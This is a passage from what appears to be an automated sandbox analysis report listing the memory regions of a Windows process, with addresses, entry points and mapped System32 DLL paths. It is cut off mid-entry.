0 entry_point = 0x7ff874881e10 region_type = mapped_file name = "notificationcontroller.dll" filename = "\\Windows\\System32\\NotificationController.dll" (normalized: "c:\\windows\\system32\\notificationcontroller.dll") Region: id = 784 start_va = 0x7ff8748f0000 end_va = 0x7ff8749c9fff monitored = 0 entry_point = 0x7ff874923c00 region_type = mapped_file name = "wpncore.dll" filename = "\\Windows\\System32\\wpncore.dll" (normalized: "c:\\windows\\system32\\wpncore.dll") Region: id = 785 start_va = 0x7ff8749d0000 end_va = 0x7ff874aeffff monitored = 0 entry_point = 0x7ff874a08310 region_type = mapped_file name = "applicationframe.dll" filename = "\\Windows\\System32\\ApplicationFrame.dll" (normalized: "c:\\windows\\system32\\applicationframe.dll") Region: id = 786 start_va = 0x7ff874af0000 end_va = 0x7ff874b3cfff monitored = 0 entry_point = 0x7ff874afd180 region_type = mapped_file name = "windows.immersiveshell.serviceprovider.dll" filename = "\\Windows\\System32\\windows.immersiveshell.serviceprovider.dll" (normalized: "c:\\windows\\system32\\windows.immersiveshell.serviceprovider.dll") Region: id = 787 start_va = 0x7ff874b40000 end_va = 0x7ff87564afff monitored = 0 entry_point = 0x7ff874c8a540 region_type = mapped_file name = "twinui.dll" filename = "\\Windows\\System32\\twinui.dll" (normalized: "c:\\windows\\system32\\twinui.dll") Region: id = 788 start_va = 0x7ff875650000 end_va = 0x7ff87569ffff monitored = 0 entry_point = 0x7ff875652580 region_type = mapped_file name = "edputil.dll" filename = "\\Windows\\System32\\edputil.dll" (normalized: "c:\\windows\\system32\\edputil.dll") Region: id = 789 start_va = 0x7ff8756a0000 end_va = 0x7ff875b3ffff monitored = 0 entry_point = 0x7ff875738740 region_type = mapped_file name = "explorerframe.dll" filename = "\\Windows\\System32\\ExplorerFrame.dll" (normalized: "c:\\windows\\system32\\explorerframe.dll") Region: id = 790 start_va = 0x7ff875b40000 end_va = 0x7ff875b89fff monitored = 0 entry_point = 0x7ff875b45800 region_type = mapped_file name = "dataexchange.dll" filename = "\\Windows\\System32\\DataExchange.dll" (normalized: "c:\\windows\\system32\\dataexchange.dll") Region: id = 791 start_va = 0x7ff875b90000 end_va = 0x7ff875bf9fff monitored = 0 entry_point = 0x7ff875ba5e90 region_type = mapped_file name = "oleacc.dll" filename = "\\Windows\\System32\\oleacc.dll" (normalized: "c:\\windows\\system32\\oleacc.dll") Region: id = 792 start_va = 0x7ff875c00000 end_va = 0x7ff875c64fff monitored = 0 entry_point = 0x7ff875c04c50 region_type = mapped_file name = "sndvolsso.dll" filename = "\\Windows\\System32\\SndVolSSO.dll" (normalized: "c:\\windows\\system32\\sndvolsso.dll") Region: id = 793 start_va = 0x7ff875c70000 end_va = 0x7ff875ee3fff monitored = 0 entry_point = 0x7ff875ce0400 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll") Region: id = 794 start_va = 0x7ff875ef0000 end_va = 0x7ff875fe8fff monitored = 0 entry_point = 0x7ff875f38000 region_type = mapped_file name = "settingsynccore.dll" filename = "\\Windows\\System32\\SettingSyncCore.dll" (normalized: "c:\\windows\\system32\\settingsynccore.dll") Region: id = 795 start_va = 0x7ff875ff0000 end_va = 0x7ff8760a0fff monitored = 0 entry_point = 0x7ff8760008f0 region_type = mapped_file name = "twinapi.dll" filename = "\\Windows\\System32\\twinapi.dll" (normalized: "c:\\windows\\system32\\twinapi.dll") Region: id = 796 start_va = 0x7ff876220000 end_va = 0x7ff876499fff monitored = 0 entry_point = 0x7ff87623a7a0 region_type = mapped_file name = "msxml6.dll" filename = "\\Windows\\System32\\msxml6.dll" (normalized: "c:\\windows\\system32\\msxml6.dll") Region: id = 797 start_va = 0x7ff876540000 end_va = 0x7ff876879fff monitored = 0 entry_point = 0x7ff876548520 region_type = mapped_file name = "msi.dll" filename = "\\Windows\\System32\\msi.dll" (normalized: "c:\\windows\\system32\\msi.dll") Region: id = 798 start_va = 0x7ff8770b0000 end_va = 0x7ff877143fff monitored = 0 entry_point = 0x7ff8770e9210 region_type = mapped_file name = "staterepository.core.dll" filename = "\\Windows\\System32\\StateRepository.Core.dll" (normalized: "c:\\windows\\system32\\staterepository.core.dll") Region: id = 799 start_va = 0x7ff877150000 end_va = 0x7ff8773f2fff monitored = 0 entry_point = 0x7ff877176190 region_type = mapped_file name = "windows.staterepository.dll" filename = "\\Windows\\System32\\Windows.StateRepository.dll" (normalized: "c:\\windows\\system32\\windows.staterepository.dll") Region: id = 800 start_va = 0x7ff877570000 end_va = 0x7ff87759afff monitored = 0 entry_point = 0x7ff87757c3c0 region_type = mapped_file name = "rtworkq.dll" filename = "\\Windows\\System32\\RTWorkQ.dll" (normalized: "c:\\windows\\system32\\rtworkq.dll") Region: id = 801 start_va = 0x7ff8775a0000 end_va = 0x7ff8776acfff monitored = 0 entry_point = 0x7ff8775cf420 region_type = mapped_file name = "mfplat.dll" filename = "\\Windows\\System32\\mfplat.dll" (normalized: "c:\\windows\\system32\\mfplat.dll") Region: id = 802 start_va = 0x7ff877730000 end_va = 0x7ff87778efff monitored = 0 entry_point = 0x7ff87775bce0 region_type = mapped_file name = "dsreg.dll" filename = "\\Windows\\System32\\dsreg.dll" (normalized: "c:\\windows\\system32\\dsreg.dll") Region: id = 803 start_va = 0x7ff877840000 end_va = 0x7ff87785afff monitored = 0 entry_point = 0x7ff87784af40 region_type = mapped_file name = "capauthz.dll" filename = "\\Windows\\System32\\capauthz.dll" (normalized: "c:\\windows\\system32\\capauthz.dll") Region: id = 804 start_va = 0x7ff877b00000 end_va = 0x7ff877bcdfff monitored = 0 entry_point = 0x7ff877b314c0 region_type = mapped_file name = "tokenbroker.dll" filename = "\\Windows\\System32\\TokenBroker.dll" (normalized: "c:\\windows\\system32\\tokenbroker.dll") Region: id = 805 start_va = 0x7ff877bd0000 end_va = 0x7ff877be4fff monitored = 0 entry_point = 0x7ff877bd5740 region_type = mapped_file name = "profext.dll" filename = "\\Windows\\System32\\profext.dll" (normalized: "c:\\windows\\system32\\profext.dll") Region: id = 806 start_va = 0x7ff877bf0000 end_va = 0x7ff877bfbfff monitored = 0 entry_point = 0x7ff877bf18b0 region_type = mapped_file name = "wldp.dll" filename = "\\Windows\\System32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll") Region: id = 807 start_va = 0x7ff877c00000 end_va = 0x7ff877c14fff monitored = 0 entry_point = 0x7ff877c02c90 region_type = mapped_file name = "settingsyncpolicy.dll" filename = "\\Windows\\System32\\SettingSyncPolicy.dll" (normalized: "c:\\windows\\system32\\settingsyncpolicy.dll") Region: id = 808 start_va = 0x7ff877cd0000 end_va = 0x7ff877ce4fff monitored = 0 entry_point = 0x7ff877cd1ab0 region_type = mapped_file name = "execmodelproxy.dll" filename = "\\Windows\\System32\\execmodelproxy.dll" (normalized: "c:\\windows\\system32\\execmodelproxy.dll") Region: id = 809 start_va = 0x7ff877db0000 end_va = 0x7ff877db9fff monitored = 0 entry_point = 0x7ff877db14c0 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 810 start_va = 0x7ff877e40000 end_va = 0x7ff87809cfff monitored = 0 entry_point = 0x7ff877ec8610 region_type = mapped_file name = "twinui.appcore.dll" filename = "\\Windows\\System32\\twinui.appcore.dll" (normalized: "c:\\windows\\system32\\twinui.appcore.dll") Region: id = 811 start_va = 0x7ff8780a0000 end_va = 0x7ff8780a8fff monitored = 0 entry_point = 0x7ff8780a1480 region_type = mapped_file name = "wpportinglibrary.dll" filename = "\\Windows\\System32\\WpPortingLibrary.dll" (normalized: "c:\\windows\\system32\\wpportinglibrary.dll") Region: id = 812 start_va = 0x7ff878390000 end_va = 0x7ff8783dafff monitored = 0 entry_point = 0x7ff8783a7b70 region_type = mapped_file name = "veeventdispatcher.dll" filename = "\\Windows\\System32\\VEEventDispatcher.dll" (normalized: "c:\\windows\\system32\\veeventdispatcher.dll") Region: id = 813 start_va = 0x7ff8784e0000 end_va = 0x7ff87857ffff monitored = 0 entry_point = 0x7ff878550910 region_type = mapped_file name = "wer.dll" filename = "\\Windows\\System32\\wer.dll" (normalized: "c:\\windows\\system32\\wer.dll") Region: id = 814 start_va = 0x7ff878d70000 end_va = 0x7ff878d7ffff monitored = 0 entry_point = 0x7ff878d73d50 region_type = mapped_file name = "pcacli.dll" filename = "\\Windows\\System32\\pcacli.dll" (normalized: "c:\\windows\\system32\\pcacli.dll") Region: id = 815 start_va = 0x7ff879040000 end_va = 0x7ff8790ebfff monitored = 0 entry_point = 0x7ff8790459c0 region_type = mapped_file name = "ieproxy.dll" filename = "\\Windows\\System32\\ieproxy.dll" (normalized: "c:\\windows\\system32\\ieproxy.dll") Region: id = 816 start_va = 0x7ff8791d0000 end_va = 0x7ff879310fff monitored = 0 entry_point = 0x7ff8791d5f70 region_type = mapped_file name = "werconcpl.dll" filename = "\\Windows\\System32\\werconcpl.dll" (normalized: "c:\\windows\\system32\\werconcpl.dll") Region: id = 817 start_va = 0x7ff879320000 end_va = 0x7ff879440fff monitored = 0 entry_point = 0x7ff879321cc0 region_type = mapped_file name = "wscui.cpl" filename = "\\Windows\\System32\\wscui.cpl" (normalized: "c:\\windows\\system32\\wscui.cpl") Region: id = 818 start_va = 0x7ff879490000 end_va = 0x7ff879717fff monitored = 0 entry_point = 0x7ff8794ef670 region_type = mapped_file name = "coreuicomponents.dll" filename = "\\Windows\\System32\\CoreUIComponents.dll" (normalized: "c:\\windows\\system32\\coreuicomponents.dll") Region: id = 819 start_va = 0x7ff879720000 end_va = 0x7ff879731fff monitored = 0 entry_point = 0x7ff879723580 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\System32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll") Region: id = 820 start_va = 0x7ff879750000 end_va = 0x7ff87975bfff monitored = 0 entry_point = 0x7ff879751860 region_type = mapped_file name = "davhlpr.dll" filename = "\\Windows\\System32\\davhlpr.dll" (normalized: "c:\\windows\\system32\\davhlpr.dll") Region: id = 821 start_va = 0x7ff879760000 end_va = 0x7ff87977ffff monitored = 0 entry_point = 0x7ff879761920 region_type = mapped_file name = "davclnt.dll" filename = "\\Windows\\System32\\davclnt.dll" (normalized: "c:\\windows\\system32\\davclnt.dll") Region: id = 822 start_va = 0x7ff879780000 end_va = 0x7ff879795fff monitored = 0 entry_point = 0x7ff879783380 region_type = mapped_file name = "ntlanman.dll" filename = "\\Windows\\System32\\ntlanman.dll" (normalized: "c:\\windows\\system32\\ntlanman.dll") Region: id = 823 start_va = 0x7ff8797a0000 end_va = 0x7ff8797aafff monitored = 0 entry_point = 0x7ff8797a1a40 region_type = mapped_file name = "drprov.dll" filename = "\\Windows\\System32\\drprov.dll" (normalized: "c:\\windows\\system32\\drprov.dll") Region: id = 824 start_va = 0x7ff8797b0000 end_va = 0x7ff8797cafff monitored = 0 entry_point = 0x7ff8797b1040 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 825 start_va = 0x7ff8797d0000 end_va = 0x7ff8797ddfff monitored = 0 entry_point = 0x7ff8797d1460 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 826 start_va = 0x7ff8797e0000 end_va = 0x7ff87985ffff monitored = 0 entry_point = 0x7ff87980d280 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 827 start_va = 0x7ff879860000 end_va = 0x7ff879874fff monitored = 0 entry_point = 0x7ff879862dc0 region_type = mapped_file name = "ondemandconnroutehelper.dll" filename = "\\Windows\\System32\\OnDemandConnRouteHelper.dll" (normalized: "c:\\windows\\system32\\ondemandconnroutehelper.dll") Region: id = 828 start_va = 0x7ff879a60000 end_va = 0x7ff879b0dfff monitored = 0 entry_point = 0x7ff879a780c0 region_type = mapped_file name = "windows.networking.connectivity.dll" filename = "\\Windows\\System32\\Windows.Networking.Connectivity.dll" (normalized: "c:\\windows\\system32\\windows.networking.connectivity.dll") Region: id = 829 start_va = 0x7ff879c90000 end_va = 0x7ff879cf6fff monitored = 0 entry_point = 0x7ff879c963e0 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 830 start_va = 0x7ff879db0000 end_va = 0x7ff879de4fff monitored = 0 entry_point = 0x7ff879db3cc0 region_type = mapped_file name = "wscapi.dll" filename = "\\Windows\\System32\\wscapi.dll" (normalized: "c:\\windows\\system32\\wscapi.dll") Region: id = 831 start_va = 0x7ff879e70000 end_va = 0x7ff879ec4fff monitored = 0 entry_point = 0x7ff879e73fb0 region_type = mapped_file name = "policymanager.dll" filename = "\\Windows\\System32\\policymanager.dll" (normalized: "c:\\windows\\system32\\policymanager.dll") Region: id = 832 start_va = 0x7ff879f30000 end_va = 0x7ff879f70fff monitored = 0 entry_point = 0x7ff879f34840 region_type = mapped_file name = "usermgrproxy.dll" filename = "\\Windows\\System32\\UserMgrProxy.dll" (normalized: "c:\\windows\\system32\\usermgrproxy.dll") Region: id = 833 start_va = 0x7ff87a240000 end_va = 0x7ff87a307fff monitored = 0 entry_point = 0x7ff87a2813f0 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 834 start_va = 0x7ff87a310000 end_va = 0x7ff87a370fff monitored = 0 entry_point = 0x7ff87a314b50 region_type = mapped_file name = "wlanapi.dll" filename = "\\Windows\\System32\\wlanapi.dll" (normalized: "c:\\windows\\system32\\wlanapi.dll") Region: id = 835 start_va = 0x7ff87a510000 end_va = 0x7ff87a57cfff monitored = 0 entry_point = 0x7ff87a51d750 region_type = mapped_file name = "photometadatahandler.dll" filename = "\\Windows\\System32\\PhotoMetadataHandler.dll" (normalized: "c:\\windows\\system32\\photometadatahandler.dll") Region: id = 836 start_va = 0x7ff87a800000 end_va = 0x7ff87a86ffff monitored = 0 entry_point = 0x7ff87a822960 region_type = mapped_file name = "mmdevapi.dll" filename = "\\Windows\\System32\\MMDevAPI.dll" (normalized: "c:\\windows\\system32\\mmdevapi.dll") Region: id = 837 start_va = 0x7ff87a9b0000 end_va = 0x7ff87a9c9fff monitored = 0 entry_point = 0x7ff87a9b2430 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 838 start_va = 0x7ff87a9d0000 end_va = 0x7ff87a9e5fff monitored = 0 entry_point = 0x7ff87a9d19f0 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 839 start_va = 0x7ff87a9f0000 end_va = 0x7ff87aa27fff monitored = 0 entry_point = 0x7ff87aa08cc0 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 840 start_va = 0x7ff87aa30000 end_va = 0x7ff87aa3afff monitored = 0 entry_point = 0x7ff87aa31d30 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 841 start_va = 0x7ff87aa90000 end_va = 0x7ff87aaa5fff monitored = 0 entry_point = 0x7ff87aa91b60 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 842 start_va = 0x7ff87ab20000 end_va = 0x7ff87ab47fff monitored = 0 entry_point = 0x7ff87ab28c10 region_type = mapped_file name = "idstore.dll" filename = "\\Windows\\System32\\IDStore.dll" (normalized: "c:\\windows\\system32\\idstore.dll") Region: id = 843 start_va = 0x7ff87abd0000 end_va = 0x7ff87ac1dfff monitored = 0 entry_point = 0x7ff87abe1ce0 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\System32\\framedynos.dll" (normalized: "c:\\windows\\system32\\framedynos.dll") Region: id = 844 start_va = 0x7ff87ac40000 end_va = 0x7ff87ac4bfff monitored = 0 entry_point = 0x7ff87ac41470 region_type = mapped_file name = "dsclient.dll" filename = "\\Windows\\System32\\dsclient.dll" (normalized: "c:\\windows\\system32\\dsclient.dll") Region: id = 845 start_va = 0x7ff87b050000 end_va = 0x7ff87b0e7fff monitored = 0 entry_point = 0x7ff87b073980 region_type = mapped_file name = "duser.dll" filename = "\\Windows\\System32\\duser.dll" (normalized: "c:\\windows\\system32\\duser.dll") Region: id = 846 start_va = 0x7ff87b130000 end_va = 0x7ff87b152fff monitored = 0 entry_point = 0x7ff87b1399a0 region_type = mapped_file name = "networkstatus.dll" filename = "\\Windows\\System32\\NetworkStatus.dll" (normalized: "c:\\windows\\system32\\networkstatus.dll") Region: id = 847 start_va = 0x7ff87b160000 end_va = 0x7ff87b178fff monitored = 0 entry_point = 0x7ff87b164520 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 848 start_va = 0x7ff87b190000 end_va = 0x7ff87b22ffff monitored = 0 entry_point = 0x7ff87b1b56b0 region_type = mapped_file name = "hgcpl.dll" filename = "\\Windows\\System32\\hgcpl.dll" (normalized: "c:\\windows\\system32\\hgcpl.dll") Region: id = 849 start_va = 0x7ff87b6f0000 end_va = 0x7ff87b700fff monitored = 0 entry_point = 0x7ff87b6f3320 region_type = mapped_file name = "wmiclnt.dll" filename = "\\Windows\\System32\\wmiclnt.dll" (normalized: "c:\\windows\\system32\\wmiclnt.dll") Region: id = 850 start_va = 0x7ff87b750000 end_va = 0x7ff87b7e1fff monitored = 0 entry_point = 0x7ff87b79a780 region_type = mapped_file name = "msvcp110_win.dll" filename = "\\Windows\\System32\\msvcp110_win.dll" (normalized: "c:\\windows\\system32\\msvcp110_win.dll") Region: id = 851 start_va = 0x7ff87b890000 end_va = 0x7ff87b930fff monitored = 0 entry_point = 0x7ff87b893db0 region_type = mapped_file name = "portabledeviceapi.dll" filename = "\\Windows\\System32\\PortableDeviceApi.dll" (normalized: "c:\\windows\\system32\\portabledeviceapi.dll") Region: id = 852 start_va = 0x7ff87b940000 end_va = 0x7ff87bafcfff monitored = 0 entry_point = 0x7ff87b96af90 region_type = mapped_file name = "windows.ui.immersive.dll" filename = "\\Windows\\System32\\Windows.UI.Immersive.dll" (normalized: "c:\\windows\\system32\\windows.ui.immersive.dll") Region: id = 853 start_va = 0x7ff87bb00000 end_va = 0x7ff87be81fff monitored = 0 entry_point = 0x7ff87bb51220 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 854 start_va = 0x7ff87be90000 end_va = 0x7ff87bfc5fff monitored = 0 entry_point = 0x7ff87bebf350 region_type = mapped_file name = "wintypes.dll" filename = "\\Windows\\System32\\WinTypes.dll" (normalized: "c:\\windows\\system32\\wintypes.dll") Region: id = 855 start_va = 0x7ff87d010000 end_va = 0x7ff87d0b8fff monitored = 0 entry_point = 0x7ff87d039010 region_type = mapped_file name = "windows.ui.dll" filename = "\\Windows\\System32\\Windows.UI.dll" (normalized: "c:\\windows\\system32\\windows.ui.dll") Region: id = 856 start_va = 0x7ff87d0c0000 end_va = 0x7ff87d1cdfff monitored = 0 entry_point = 0x7ff87d10eaa0 region_type = mapped_file name = "mrmcorer.dll" filename = "\\Windows\\System32\\MrmCoreR.dll" (normalized: "c:\\windows\\system32\\mrmcorer.dll") Region: id = 857 start_va = 0x7ff87d1d0000 end_va = 0x7ff87d239fff monitored = 0 entry_point = 0x7ff87d1d9d60 region_type = mapped_file name = "wincorlib.dll" filename = "\\Windows\\System32\\wincorlib.dll" (normalized: "c:\\windows\\system32\\wincorlib.dll") Region: id = 858 start_va = 0x7ff87d240000 end_va = 0x7ff87d2c1fff monitored = 0 entry_point = 0x7ff87d244ef0 region_type = mapped_file name = "imapi2.dll" filename = "\\Windows\\System32\\imapi2.dll" (normalized: "c:\\windows\\system32\\imapi2.dll") Region: id = 859 start_va = 0x7ff87d2d0000 end_va = 0x7ff87d32cfff monitored = 0 entry_point = 0x7ff87d2d6c90 region_type = mapped_file name = "srchadmin.dll" filename = "\\Windows\\System32\\srchadmin.dll" (normalized: "c:\\windows\\system32\\srchadmin.dll") Region: id = 860 start_va = 0x7ff87d400000 end_va = 0x7ff87d4c5fff monitored = 0 entry_point = 0x7ff87d403ac0 region_type = mapped_file name = "cscui.dll" filename = "\\Windows\\System32\\cscui.dll" (normalized: "c:\\windows\\system32\\cscui.dll") Region: id = 861 start_va = 0x7ff87d630000 end_va = 0x7ff87d6a9fff monitored = 0 entry_point = 0x7ff87d657630 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 862 start_va = 0x7ff87d6b0000 end_va = 0x7ff87d6c3fff monitored = 0 entry_point = 0x7ff87d6b50c0 region_type = mapped_file name = "hcproviders.dll" filename = "\\Windows\\System32\\hcproviders.dll" (normalized: "c:\\windows\\system32\\hcproviders.dll") Region: id = 863 start_va = 0x7ff87d7f0000 end_va = 0x7ff87d853fff monitored = 0 entry_point = 0x7ff87d805ae0 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 864 start_va = 0x7ff87db50000 end_va = 0x7ff87e094fff monitored = 0 entry_point = 0x7ff87dcea450 region_type = mapped_file name = "d2d1.dll" filename = "\\Windows\\System32\\d2d1.dll" (normalized: "c:\\windows\\system32\\d2d1.dll") Region: id = 865 start_va = 0x7ff87e0a0000 end_va = 0x7ff87e30efff monitored = 0 entry_point = 0x7ff87e1522b0 region_type = mapped_file name = "d3d10warp.dll" filename = "\\Windows\\System32\\d3d10warp.dll" (normalized: "c:\\windows\\system32\\d3d10warp.dll") Region: id = 866 start_va = 0x7ff87e310000 end_va = 0x7ff87e34ffff monitored = 0 entry_point = 0x7ff87e326c60 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 867 start_va = 0x7ff87e5f0000 end_va = 0x7ff87e63afff monitored = 0 entry_point = 0x7ff87e6072b0 region_type = mapped_file name = "uianimation.dll" filename = "\\Windows\\System32\\UIAnimation.dll" (normalized: "c:\\windows\\system32\\uianimation.dll") Region: id = 868 start_va = 0x7ff87e640000 end_va = 0x7ff87e7f0fff monitored = 0 entry_point = 0x7ff87e6d61a0 region_type = mapped_file name = "windowscodecs.dll" filename = "\\Windows\\System32\\WindowsCodecs.dll" (normalized: "c:\\windows\\system32\\windowscodecs.dll") Region: id = 869 start_va = 0x7ff87e800000 end_va = 0x7ff87e8a1fff monitored = 0 entry_point = 0x7ff87e820a40 region_type = mapped_file name = "dxgi.dll" filename = "\\Windows\\System32\\dxgi.dll" (normalized: "c:\\windows\\system32\\dxgi.dll") Region: id = 870 start_va = 0x7ff87e8b0000 end_va = 0x7ff87eb57fff monitored = 0 entry_point = 0x7ff87e943250 region_type = mapped_file name = "d3d11.dll" filename = "\\Windows\\System32\\d3d11.dll" (normalized: "c:\\windows\\system32\\d3d11.dll") Region: id = 871 start_va = 0x7ff87eb60000 end_va = 0x7ff87eb81fff monitored = 0 entry_point = 0x7ff87eb61a40 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 872 start_va = 0x7ff87ebc0000 end_va = 0x7ff87ec7dfff monitored = 0 entry_point = 0x7ff87ec02d40 region_type = mapped_file name = "coremessaging.dll" filename = "\\Windows\\System32\\CoreMessaging.dll" (normalized: "c:\\windows\\system32\\coremessaging.dll") Region: id = 873 start_va = 0x7ff87ec80000 end_va = 0x7ff87ed62fff monitored = 0 entry_point = 0x7ff87ecb7da0 region_type = mapped_file name = "dcomp.dll" filename = "\\Windows\\System32\\dcomp.dll" (normalized: "c:\\windows\\system32\\dcomp.dll") Region: id = 874 start_va = 0x7ff87f150000 end_va = 0x7ff87f1c8fff monitored = 0 entry_point = 0x7ff87f16fb90 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll") Region: id = 875 start_va = 0x7ff87f1d0000 end_va = 0x7ff87f220fff monitored = 0 entry_point = 0x7ff87f1d25e0 region_type = mapped_file name = "cscobj.dll" filename = "\\Windows\\System32\\cscobj.dll" (normalized: "c:\\windows\\system32\\cscobj.dll") Region: id = 876 start_va = 0x7ff87f340000 end_va = 0x7ff87f37ffff monitored = 0 entry_point = 0x7ff87f353750 region_type = mapped_file name = "settingmonitor.dll" filename = "\\Windows\\System32\\SettingMonitor.dll" (normalized: "c:\\windows\\system32\\settingmonitor.dll") Region: id = 877 start_va = 0x7ff87f380000 end_va = 0x7ff87f812fff monitored = 0 entry_point = 0x7ff87f38f760 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll") Region: id = 878 start_va = 0x7ff87f820000 end_va = 0x7ff87f886fff monitored = 0 entry_point = 0x7ff87f83e710 region_type = mapped_file name = "bcp47langs.dll" filename = "\\Windows\\System32\\BCP47Langs.dll" (normalized: "c:\\windows\\system32\\bcp47langs.dll") Region: id = 879 start_va = 0x7ff87f890000 end_va = 0x7ff87f8defff monitored = 0 entry_point = 0x7ff87f897ab0 region_type = mapped_file name = "inputswitch.dll" filename = "\\Windows\\System32\\InputSwitch.dll" (normalized: "c:\\windows\\system32\\inputswitch.dll") Region: id = 880 start_va = 0x7ff87f8e0000 end_va = 0x7ff87fa65fff monitored = 0 entry_point = 0x7ff87f92d700 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 881 start_va = 0x7ff87fa70000 end_va = 0x7ff87fa8bfff monitored = 0 entry_point = 0x7ff87fa737a0 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 882 start_va = 0x7ff87faa0000 end_va = 0x7ff87facdfff monitored = 0 entry_point = 0x7ff87faa6580 region_type = mapped_file name = "wscinterop.dll" filename = "\\Windows\\System32\\wscinterop.dll" (normalized: "c:\\windows\\system32\\wscinterop.dll") Region: id = 883 start_va = 0x7ff87fad0000 end_va = 0x7ff87fae2fff monitored = 0 entry_point = 0x7ff87fad2760 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 884 start_va = 0x7ff87faf0000 end_va = 0x7ff87fb14fff monitored = 0 entry_point = 0x7ff87faf2300 region_type = mapped_file name = "sppc.dll" filename = "\\Windows\\System32\\sppc.dll" (normalized: "c:\\windows\\system32\\sppc.dll") Region: id = 885 start_va = 0x7ff87fb50000 end_va = 0x7ff87fb74fff monitored = 0 entry_point = 0x7ff87fb65220 region_type = mapped_file name = "slc.dll" filename = "\\Windows\\System32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll") Region: id = 886 start_va = 0x7ff87fba0000 end_va = 0x7ff87fbd2fff monitored = 0 entry_point = 0x7ff87fba3800 region_type = mapped_file name = "portabledevicetypes.dll" filename = "\\Windows\\System32\\PortableDeviceTypes.dll" (normalized: "c:\\windows\\system32\\portabledevicetypes.dll") Region: id = 887 start_va = 0x7ff87fbe0000 end_va = 0x7ff87fbf4fff monitored = 0 entry_point = 0x7ff87fbe2850 region_type = mapped_file name = "wpdshserviceobj.dll" filename = "\\Windows\\System32\\WPDShServiceObj.dll" (normalized: "c:\\windows\\system32\\wpdshserviceobj.dll") Region: id = 888 start_va = 0x7ff87fc00000 end_va = 0x7ff87fc3bfff monitored = 0 entry_point = 0x7ff87fc025e0 region_type = mapped_file name = "bthprops.cpl" filename = "\\Windows\\System32\\bthprops.cpl" (normalized: "c:\\windows\\system32\\bthprops.cpl") Region: id = 889 start_va = 0x7ff87fc60000 end_va = 0x7ff87fcf5fff monitored = 0 entry_point = 0x7ff87fc85570 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 890 start_va = 0x7ff87fd00000 end_va = 0x7ff87fd26fff monitored = 0 entry_point = 0x7ff87fd07940 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 891 start_va = 0x7ff87fd50000 end_va = 0x7ff87fdf9fff monitored = 0 entry_point = 0x7ff87fd77910 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 892 start_va = 0x7ff87fe00000 end_va = 0x7ff87fefffff monitored = 0 entry_point = 0x7ff87fe40f80 region_type = mapped_file name = "twinapi.appcore.dll" filename = 